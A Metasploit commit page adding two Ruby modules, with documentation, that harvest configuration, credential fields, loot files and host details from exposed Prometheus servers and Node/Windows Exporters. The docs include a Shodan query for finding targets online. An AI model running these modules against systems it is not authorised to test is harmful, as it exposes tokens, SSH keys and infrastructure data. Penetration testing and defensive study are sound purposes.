forked from rapid7/metasploit-framework

Commit: Land rapid7#18290, Prometheus API & Prometheus Node Exporter Interrogator

Merge branch 'land-18290' into upstream-master

Showing 6 changed files with 2,522 additions and 0 deletions.
61 changes: 61 additions & 0 deletions
documentation/modules/auxiliary/gather/prometheus_api_gather.md
## Vulnerable Application

This module uses Prometheus' API calls to gather information about
the server's configuration and targets. Fields that may contain
credentials or credential file names are then pulled out and printed.

Targets may hold a wealth of information; this module prints the following
values when found:
`__meta_gce_metadata_ssh_keys`, `__meta_gce_metadata_startup_script`,
`__meta_gce_metadata_kube_env`, `kubernetes_sd_configs`,
`_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration`,
`__meta_ec2_tag_CreatedBy`, `__meta_ec2_tag_OwnedBy`

Shodan search: `"http.favicon.hash:-1399433489"`
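
The per-target key scan described above can be sketched outside the module; a minimal example, assuming a parsed entry from the `activeTargets` array of Prometheus' `/api/v1/targets` JSON (the sample labels are made up):

```ruby
require 'json'

# Hypothetical activeTargets entry; the key list mirrors the label
# names called out above.
target = JSON.parse('{"discoveredLabels":{"__meta_ec2_tag_OwnedBy":"ops-team","job":"node"}}')
keys = %w[
  __meta_gce_metadata_ssh_keys
  __meta_gce_metadata_startup_script
  __meta_ec2_tag_CreatedBy
  __meta_ec2_tag_OwnedBy
]
keys.each do |key|
  value = target.dig('discoveredLabels', key)
  puts "#{key} => #{value}" if value
end
```

Only keys actually present in the target's labels are printed; everything else is skipped silently.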

A Docker image is [available](https://hub.docker.com/r/prom/prometheus); however,
this basic configuration holds almost no interesting data. Configuring it can be tricky,
as the server may not start if it cannot reach the services it is configured to scrape.

## Verification Steps

1. Install the application or find one on the Internet
1. Start msfconsole
1. Do: `use auxiliary/gather/prometheus_api_gather`
1. Do: `set rhosts [ip]`
1. Do: `run`
1. You should get back any valuable information the server exposes
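
As a quick manual sanity check, the version extraction the module performs against `/api/v1/status/buildinfo` looks like this; the response body below is illustrative:

```ruby
require 'json'

# Illustrative body of a /api/v1/status/buildinfo response
body = '{"status":"success","data":{"version":"2.39.1","goVersion":"go1.19.2"}}'
json = JSON.parse(body)
version = json.dig('data', 'version')
raise 'unable to find version number' unless version

puts "Prometheus found, version: #{version}"
```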

## Options

## Scenarios

### Prometheus 2.39.1

```
msf6 auxiliary(gather/prometheus_api_gather) > set rhosts 11.111.11.111
rhosts => 11.111.11.111
msf6 auxiliary(gather/prometheus_api_gather) > set rport 80
rport => 80
msf6 auxiliary(gather/prometheus_api_gather) > run
[*] Running module against 11.111.11.111
[*] 11.111.11.111:80 - Checking build info
[+] Prometheus found, version: 2.39.1
[*] 11.111.11.111:80 - Checking status config
[+] YAML config saved to /root/.msf4/loot/20230815174315_default_11.111.11.111_PrometheusYAML_982929.yaml
[+] Credentials
===========
Name                       Config         Public/Username  Private/Password/Token
----                       ------         ---------------  ----------------------
kubernetes-apiservers      authorization  Bearer           /var/run/secrets/kubernetes.io/serviceaccount/token
kubernetes-nodes           authorization  Bearer           /var/run/secrets/kubernetes.io/serviceaccount/token
kubernetes-nodes-cadvisor  authorization  Bearer           /var/run/secrets/kubernetes.io/serviceaccount/token
[*] 11.111.11.111:80 - Checking targets
[+] JSON targets saved to /root/.msf4/loot/20230815174315_default_11.111.11.111_PrometheusJSON_145604.json
[*] 11.111.11.111:80 - Checking status flags
[+] Config file: /etc/config/prometheus.yml
[*] Auxiliary module execution completed
```
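
The credential fields shown in the table above come out of the scraped YAML config. A minimal sketch of pulling `authorization` entries from a Prometheus-format `scrape_configs` fragment (the job name and token path are illustrative; this is not the module's actual parser):

```ruby
require 'yaml'

# Illustrative scrape_configs fragment in Prometheus' config format
yaml = <<~CONFIG
  scrape_configs:
    - job_name: kubernetes-apiservers
      authorization:
        type: Bearer
        credentials_file: /var/run/secrets/kubernetes.io/serviceaccount/token
CONFIG

config = YAML.safe_load(yaml)
config['scrape_configs'].each do |job|
  auth = job['authorization']
  next unless auth

  puts "#{job['job_name']}: #{auth['type']} #{auth['credentials_file']}"
end
```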
132 changes: 132 additions & 0 deletions
documentation/modules/auxiliary/gather/prometheus_node_exporter_gather.md
## Vulnerable Application

This module connects to a Prometheus Node Exporter or Windows Exporter service
and gathers information about the host.

Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1.

### Install

#### Docker

`docker run -d --net="host" --pid="host" -v "/:/host:ro,rslave" quay.io/prometheus/node-exporter:latest --path.rootfs=/host`

#### Linux

[Instructions](https://prometheus.io/docs/guides/node-exporter/#installing-and-running-the-node-exporter)

```
wget https://github.com/prometheus/node_exporter/releases/download/v1.6.1/node_exporter-1.6.1.linux-amd64.tar.gz
tar xvfz node_exporter-1.6.1.linux-amd64.tar.gz
cd node_exporter-*.*-amd64
./node_exporter --collector.buddyinfo --collector.cgroups --collector.drm --collector.drbd --collector.ethtool --collector.interrupts --collector.ksmd --collector.lnstat --collector.logind --collector.meminfo_numa --collector.mountstats --collector.network_route --collector.perf --collector.processes --collector.qdisc --collector.slabinfo --collector.softirqs --collector.sysctl --collector.systemd --collector.tcpstat --collector.wifi --collector.zoneinfo
```

#### Windows

Download the latest release from [GitHub](https://github.com/prometheus-community/windows_exporter/releases).

Run it with the following command:

```
.\windows_exporter-0.23.1-amd64.exe --collectors.enabled ad,adcs,adfs,cache,cpu,cpu_info,cs,container,dfsr,dhcp,dns,exchange,fsrmquota,hyperv,iis,logical_disk,logon,memory,mscluster_cluster,mscluster_network,mscluster_node,mscluster_resource,mscluster_resourcegroup,msmq,mssql,netframework_clrexceptions,netframework_clrinterop,netframework_clrjit,netframework_clrloading,netframework_clrlocksandthreads,netframework_clrmemory,netframework_clrremoting,netframework_clrsecurity,net,os,process,remote_fx,scheduled_task,service,smtp,system,tcp,teradici_pcoip,time,thermalzone,terminal_services,textfile,vmware_blast,vmware
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use auxiliary/gather/prometheus_node_exporter_gather`
1. Do: `set rhosts [ip]`
1. Do: `run`
1. You should get information back about the host.

## Options

## Scenarios

### Docker 1.6.1

```
msf6 > use auxiliary/gather/prometheus_node_exporter_gather
msf6 auxiliary(gather/prometheus_node_exporter_gather) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(gather/prometheus_node_exporter_gather) > set verbose true
verbose => true
msf6 auxiliary(gather/prometheus_node_exporter_gather) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:9100 - Checking
[+] 127.0.0.1:9100 - Prometheus Node Exporter version: 1.6.1
[+] Go Version: go1.20.6
[+] SELinux enabled: 0
[+] Timezone: UTC
[+] BIOS Information
================
Field              Value
-----              -----
Asset Tag
Board Name         000000
Board Vendor       Sanitized
Board Version      111
Chassis Asset Tag
Chassis Vendor     Sanitized
Date               04/17/2023
Product Family     Sanitized
Product Name       Sanitized
System Vendor      Sanitized
Vendor             Sanitized
Version            1.0.0
[+] OS Information
==============
Field             Value
-----             -----
Family            kali
Name              Kali GNU/Linux
Pretty Name       Kali GNU/Linux Rolling
Version           2023.3
Version Codename  kali-rolling
Version ID        2023.3
[+] Network Interfaces
==================
Device           MAC                Broadcast          State
------           ---                ---------          -----
br-4b55fa64cd13  de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  down
br-65f1f7a9ff61  de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  down
docker0          de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  up
eth0             de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  down
lo               de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  unknown
vethe418d5c      de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  up
wlan0            de:ad:be:ef:de:ad  de:ad:be:ef:de:ad  up
[+] File Systems
============
Device                         Mount Point     FS Type
------                         -----------     -------
/dev/mapper/map--new--vg-root  /               ext4
/dev/nvme0n1p1                 /boot/efi       vfat
/dev/nvme1n1p2                 /boot           ext2
tmpfs                          /run            tmpfs
tmpfs                          /run/lock       tmpfs
tmpfs                          /run/user/1000  tmpfs
tmpfs                          /run/user/125   tmpfs
[+] uname Information
=================
Field        Value
-----        -----
Arch         x86_64
Domain Name  (none)
Node Name    ragekali-new
OS Type      Linux
Release      6.3.0-kali1-amd64
Version      #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29)
[*] Auxiliary module execution completed
```
151 changes: 151 additions & 0 deletions
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Prometheus

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Prometheus API Information Gather',
        'Description' => %q{
          This module utilizes Prometheus' API calls to gather information about
          the server's configuration, and targets. Fields which may contain
          credentials, or credential file names are then pulled out and printed.
          Targets may have a wealth of information, this module will print the following
          values when found:
          __meta_gce_metadata_ssh_keys, __meta_gce_metadata_startup_script,
          __meta_gce_metadata_kube_env, kubernetes_sd_configs,
          _meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration,
          __meta_ec2_tag_CreatedBy, __meta_ec2_tag_OwnedBy
          Shodan search: "http.favicon.hash:-1399433489"
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die'
        ],
        'References' => [
          ['URL', 'https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/']
        ],
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => '2016-07-01', # Prometheus 1.0 release date, who knows....
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(9090),
        OptString.new('TARGETURI', [ true, 'The URI of Prometheus', '/'])
      ]
    )
  end

  def run
    vprint_status("#{peer} - Checking build info")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'status', 'buildinfo'),
      'method' => 'GET'
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200
    json = res.get_json_document
    version = json.dig('data', 'version')
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (unable to find version number)") unless version
    print_good("Prometheus found, version: #{version}")

    vprint_status("#{peer} - Checking status config")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'status', 'config'),
      'method' => 'GET'
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200
    json = res.get_json_document
    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to parse JSON document") unless json
    yaml = json.dig('data', 'yaml')
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (unable to find yaml)") unless yaml
    begin
      yamlconf = YAML.safe_load(yaml)
      loot_path = store_loot('Prometheus YAML Config', 'application/yaml', datastore['RHOST'], yaml, 'config.yaml')
      print_good("YAML config saved to #{loot_path}")
      prometheus_config_eater(yamlconf)
    rescue Psych::DisallowedClass
      # e.g. [-] Auxiliary failed: Psych::DisallowedClass Tried to load unspecified class: Symbol
      print_bad('Unable to load YAML')
    end

    vprint_status("#{peer} - Checking targets")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'targets'),
      'method' => 'GET'
    )
    table_targets = Rex::Text::Table.new(
      'Header' => 'Target Data',
      'Indent' => 2,
      'Columns' =>
        [
          'Field',
          'Data'
        ]
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200

    json = res.get_json_document
    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to parse JSON document") unless json
    loot_path = store_loot('Prometheus JSON targets', 'application/json', datastore['RHOST'], json.to_json, 'targets.json')
    print_good("JSON targets saved to #{loot_path}")
    json.dig('data', 'activeTargets').each do |target|
      [
        '__meta_gce_metadata_ssh_keys', '__meta_gce_metadata_startup_script', '__meta_gce_metadata_kube_env', 'kubernetes_sd_configs',
        '_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration', '__meta_ec2_tag_CreatedBy', '__meta_ec2_tag_OwnedBy'
      ].each do |key|
        if target[key]
          table_targets << [
            key,
            target[key]
          ]
        end

        next unless target.dig('discoveredLabels', key)

        table_targets << [
          key,
          target.dig('discoveredLabels', key)
        ]
      end
    end

    print_good(table_targets.to_s) if !table_targets.rows.empty?

    vprint_status("#{peer} - Checking status flags")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'status', 'flags'),
      'method' => 'GET'
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200
    json = res.get_json_document
    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to parse JSON document") unless json
    print_good("Config file: #{json.dig('data', 'config.file')}") if json.dig('data', 'config.file')
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end
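
The `Psych::DisallowedClass` rescue above can be reproduced in isolation. A short sketch of why `YAML.safe_load` may reject a server-supplied config:

```ruby
require 'yaml'

# safe_load only permits a small default set of classes; anything else
# (for example a !ruby/symbol tag) raises Psych::DisallowedClass,
# which is why the module wraps the parse in a rescue.
begin
  YAML.safe_load('--- !ruby/symbol not_allowed')
rescue Psych::DisallowedClass => e
  puts "Unable to load YAML: #{e.message}"
end

# Plain mappings of strings parse fine
puts YAML.safe_load('key: value')['key']
```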
315 changes: 315 additions & 0 deletions
modules/auxiliary/gather/prometheus_node_exporter_gather.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Prometheus

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Prometheus Node Exporter And Windows Exporter Information Gather',
        'Description' => %q{
          This module connects to a Prometheus Node Exporter or Windows Exporter service
          and gathers information about the host.
          Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die'
        ],
        'References' => [
          ['URL', 'https://github.com/prometheus/node_exporter'],
          ['URL', 'https://sysdig.com/blog/exposed-prometheus-exploit-kubernetes-kubeconeu/']
        ],
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => '2013-04-18', # node exporter first commit on github
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(9100), # windows 9182
        OptString.new('TARGETURI', [ true, 'The URI of the Prometheus Node Exporter', '/'])
      ]
    )
  end

  def run
    vprint_status("#{peer} - Checking")
    # since we will check res to see if auth was a success, make sure to capture the return
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200
    fail_with(Failure::UnexpectedReply, "#{peer} - Prometheus Node Exporter not found") unless (
      res.body.include?('<h2>Prometheus Node Exporter</h2>') ||
      res.body.include?('<title>Node Exporter</title>') || # version 0.15.2
      res.body.include?('<h2>Prometheus Exporter for Windows servers</h2>')
    )

    vprint_good("#{peer} - Prometheus Node Exporter version: #{Regexp.last_match(1)}") if res.body =~ /version=([\d.]+)/

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'metrics'),
      'method' => 'GET'
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server (response code #{res.code})") unless res.code == 200

    results = process_results_page(res.body)

    if results.nil? || results == []
      print_bad("#{peer} - No metric data found")
      return
    end

    table_network = Rex::Text::Table.new(
      'Header' => 'Network Interfaces',
      'Indent' => 2,
      'Columns' =>
        [
          'Device',
          'MAC',
          'Broadcast',
          'State',
        ]
    )

    table_fs = Rex::Text::Table.new(
      'Header' => 'File Systems',
      'Indent' => 2,
      'Columns' =>
        [
          'Device',
          'Mount Point',
          'FS Type',
        ]
    )

    table_bios = Rex::Text::Table.new(
      'Header' => 'BIOS Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Field',
          'Value',
        ]
    )

    table_os = Rex::Text::Table.new(
      'Header' => 'OS Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Field',
          'Value',
        ]
    )

    table_uname = Rex::Text::Table.new(
      'Header' => 'uname Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Field',
          'Value',
        ]
    )

    table_windows_domain = Rex::Text::Table.new(
      'Header' => 'Domain Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Field',
          'Value',
        ]
    )

    table_device_mapper = Rex::Text::Table.new(
      'Header' => 'Disk Device Mapper Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Device',
          'Name',
          'Logical Volume Name',
          'UUID'
        ]
    )

    table_network_route = Rex::Text::Table.new(
      'Header' => 'Network Route Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Device',
          'IP',
          'Gateway',
          'Network'
        ]
    )

    table_systemd = Rex::Text::Table.new(
      'Header' => 'Systemd Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Service',
          'State',
          'Permission'
        ]
    )

    table_windows_cpu = Rex::Text::Table.new(
      'Header' => 'CPU Information',
      'Indent' => 2,
      'Columns' =>
        [
          'Field',
          'Value',
        ]
    )

    results.each do |result|
      if result['go_info']
        print_good("Go Version: #{result.dig('go_info', 'labels', 'version')}")
      elsif result['node_selinux_enabled']
        print_good("SELinux enabled: #{result.dig('node_selinux_enabled', 'value')}")
      elsif result['node_time_zone_offset_seconds']
        print_good("Timezone: #{result.dig('node_time_zone_offset_seconds', 'labels', 'time_zone')}")
      elsif result['windows_os_timezone']
        print_good("Timezone: #{result.dig('windows_os_timezone', 'labels', 'timezone')}")
      elsif result['node_dmi_info']
        table_bios << ['Date', result.dig('node_dmi_info', 'labels', 'bios_date')]
        table_bios << ['Vendor', result.dig('node_dmi_info', 'labels', 'bios_vendor')]
        table_bios << ['Version', result.dig('node_dmi_info', 'labels', 'bios_version')]
        table_bios << ['Asset Tag', result.dig('node_dmi_info', 'labels', 'board_asset_tag')]
        table_bios << ['Board Vendor', result.dig('node_dmi_info', 'labels', 'board_vendor')]
        table_bios << ['Board Name', result.dig('node_dmi_info', 'labels', 'board_name')]
        table_bios << ['Board Version', result.dig('node_dmi_info', 'labels', 'board_version')]
        table_bios << ['Chassis Asset Tag', result.dig('node_dmi_info', 'labels', 'chassis_asset_tag')]
        table_bios << ['Chassis Vendor', result.dig('node_dmi_info', 'labels', 'chassis_vendor')]
        table_bios << ['Product Family', result.dig('node_dmi_info', 'labels', 'product_family')]
        table_bios << ['Product Name', result.dig('node_dmi_info', 'labels', 'product_name')]
        table_bios << ['System Vendor', result.dig('node_dmi_info', 'labels', 'system_vendor')]
      elsif result['node_filesystem_avail_bytes']
        table_fs << [
          result.dig('node_filesystem_avail_bytes', 'labels', 'device'),
          result.dig('node_filesystem_avail_bytes', 'labels', 'mountpoint'),
          result.dig('node_filesystem_avail_bytes', 'labels', 'fstype'),
        ]
      elsif result['node_filesystem_avail'] # version 0.15.2
        table_fs << [
          result.dig('node_filesystem_avail', 'labels', 'device'),
          result.dig('node_filesystem_avail', 'labels', 'mountpoint'),
          result.dig('node_filesystem_avail', 'labels', 'fstype'),
        ]
      elsif result['windows_logical_disk_size_bytes']
        table_fs << [
          '',
          result.dig('windows_logical_disk_size_bytes', 'labels', 'volume'),
          '',
        ]
      elsif result['node_network_info']
        table_network << [
          result.dig('node_network_info', 'labels', 'device'),
          result.dig('node_network_info', 'labels', 'address'),
          result.dig('node_network_info', 'labels', 'broadcast'),
          result.dig('node_network_info', 'labels', 'operstate')
        ]
      elsif result['node_os_info']
        table_os << ['Family', result.dig('node_os_info', 'labels', 'id')]
        table_os << ['Name', result.dig('node_os_info', 'labels', 'name')]
        table_os << ['Version', result.dig('node_os_info', 'labels', 'version')]
        table_os << ['Version ID', result.dig('node_os_info', 'labels', 'version_id')]
        table_os << ['Version Codename', result.dig('node_os_info', 'labels', 'version_codename')]
        table_os << ['Pretty Name', result.dig('node_os_info', 'labels', 'pretty_name')]
      elsif result['windows_os_info']
        table_os << ['Product', result.dig('windows_os_info', 'labels', 'product')]
        table_os << ['Version', result.dig('windows_os_info', 'labels', 'version')]
        table_os << ['Build Number', result.dig('windows_os_info', 'labels', 'build_number')]
      elsif result['node_uname_info']
        table_uname << ['Domain Name', result.dig('node_uname_info', 'labels', 'domainname')]
        table_uname << ['Arch', result.dig('node_uname_info', 'labels', 'machine')]
        table_uname << ['Release', result.dig('node_uname_info', 'labels', 'release')]
        table_uname << ['OS Type', result.dig('node_uname_info', 'labels', 'sysname')]
        table_uname << ['Version', result.dig('node_uname_info', 'labels', 'version')]
        table_uname << ['Node Name', result.dig('node_uname_info', 'labels', 'nodename')]
      elsif result['windows_cs_hostname']
        table_windows_domain << ['Domain Name', result.dig('windows_cs_hostname', 'labels', 'domain')]
        table_windows_domain << ['FQDN', result.dig('windows_cs_hostname', 'labels', 'fqdn')]
        table_windows_domain << ['Hostname', result.dig('windows_cs_hostname', 'labels', 'hostname')]
      elsif result['node_disk_device_mapper_info']
        table_device_mapper << [
          result.dig('node_disk_device_mapper_info', 'labels', 'device'),
          result.dig('node_disk_device_mapper_info', 'labels', 'name'),
          result.dig('node_disk_device_mapper_info', 'labels', 'lv_name'),
          result.dig('node_disk_device_mapper_info', 'labels', 'uuid'),
        ]
      elsif result['node_network_route_info']
        table_network_route << [
          result.dig('node_network_route_info', 'labels', 'device'),
          result.dig('node_network_route_info', 'labels', 'src'),
          result.dig('node_network_route_info', 'labels', 'gw'),
          result.dig('node_network_route_info', 'labels', 'dest'),
        ]
      elsif result['windows_net_bytes_sent_total']
        table_network_route << [
          result.dig('windows_net_bytes_sent_total', 'labels', 'nic'),
          '',
          '',
          '',
        ]
      elsif result['node_systemd_unit_state']
        # these come back in groups of 4-5 where the value is 0 if a state isn't enabled.
        # we only care about state 1 because that's what the service is at run time
        if result.dig('node_systemd_unit_state', 'value') == '1'
          table_systemd << [
            result.dig('node_systemd_unit_state', 'labels', 'name'),
            result.dig('node_systemd_unit_state', 'labels', 'state'),
            ''
          ]
        end
      elsif result['windows_service_info']
        table_systemd << [
          result.dig('windows_service_info', 'labels', 'display_name'),
          result.dig('windows_service_info', 'labels', 'process_id') == '0' ? 'inactive' : 'active',
          result.dig('windows_service_info', 'labels', 'run_as'),
        ]
      elsif result['windows_cpu_info']
        table_windows_cpu << ['ID', result.dig('windows_cpu_info', 'labels', 'device_id')]
        table_windows_cpu << ['Architecture', result.dig('windows_cpu_info', 'labels', 'architecture')]
        table_windows_cpu << ['Description', result.dig('windows_cpu_info', 'labels', 'description')]
        table_windows_cpu << ['Name', result.dig('windows_cpu_info', 'labels', 'name')]
      end
    end

    [
      table_bios, table_os, table_network, table_windows_domain, table_fs, table_uname, table_windows_cpu,
      table_device_mapper, table_network_route, table_systemd,
    ].each do |table|
      print_good(table.to_s) if !table.rows.empty?
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end